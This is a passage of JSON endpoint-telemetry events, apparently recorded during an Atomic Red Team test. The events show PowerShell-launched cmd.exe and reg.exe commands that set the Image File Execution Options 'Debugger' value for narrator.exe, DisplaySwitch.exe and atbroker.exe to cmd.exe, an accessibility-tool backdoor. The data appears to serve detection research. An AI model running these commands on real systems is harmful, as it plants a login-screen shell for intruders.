"{42FC7E13-CB3E-5C05-0000-00107A375101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7012, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571827380016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827300000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827300000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827300000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827300000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": 
"C:\\Windows\\System32\\msvcrt.dll", - "pid": 7012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827300000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" - }, - { - "event_type": "process", - "pid": 7012, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571827450016, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010CC395101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\narrator.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6112, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571828000000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6112, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827920000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6112, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827920000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": 
"C:\\Windows\\System32\\kernel32.dll", - "pid": 6112, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827920000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6112, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827920000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6112, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571827920000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" - }, - { - "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\narrator.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4532, - "ppid": 6112, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}", - "unique_ppid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - 
"pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 
131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "registry", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe", - "registry_value": "narrator.exe", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "registry", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe\\Debugger", - "registry_value": "Debugger", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "process", - "pid": 4532, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00101E3F5101}" - }, - { - "event_type": "process", - "pid": 6112, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571828080000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00102A3E5101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - 
"parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5920, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571828250000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828240000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828240000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828240000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828240000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828240000, 
- "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" - }, - { - "event_type": "process", - "pid": 5920, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571828240000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00107D405101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4764, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828860000, - "unique_pid": 
"{42FC7E13-CB3E-5C05-0000-0010DE445101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" - }, - { - "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4916, - "ppid": 4764, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571828950000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}", - "unique_ppid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" 
- }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", 
- "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571828860000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "registry", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\displayswitch.exe", - "registry_value": "displayswitch.exe", - "timestamp": 131883571829020000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "registry", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\WINDOWS\\system32\\reg.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\displayswitch.exe", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\displayswitch.exe\\Debugger", - "registry_value": "Debugger", - "timestamp": 131883571829020000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "process", - "pid": 4916, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571829020000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010D1455101}" - }, - { - "event_type": "process", - "pid": 4764, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571829020000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010DE445101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2960, - "ppid": 7036, - 
"process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571829120000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2960, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829020000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2960, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829020000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2960, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829020000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2960, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829020000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2960, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829020000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" - }, - { - "event_type": "process", - "pid": 2960, - "process_name": "cmd.exe", - "process_path": 
"C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571829180000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-001030475101}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\atbroker.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 556, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571829730000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", 
- "pid": 556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 556, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571829640000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}" - }, - { - "command_line": "reg add \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution \"Options\\atbroker.exe /v Debugger /t REG_SZ /d C:\\windows\\system32\\cmd.exe /f", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7292, - "ppid": 556, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571829830000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}", - "unique_ppid": "{42FC7E13-CB3E-5C05-0000-00108E4B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7292, - "process_name": "reg.exe", - 
"process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571829800000, - "unique_pid": "{42FC7E13-CB3E-5C05-0000-0010814C5101}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7292, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571829800000, - "unique_pid": 
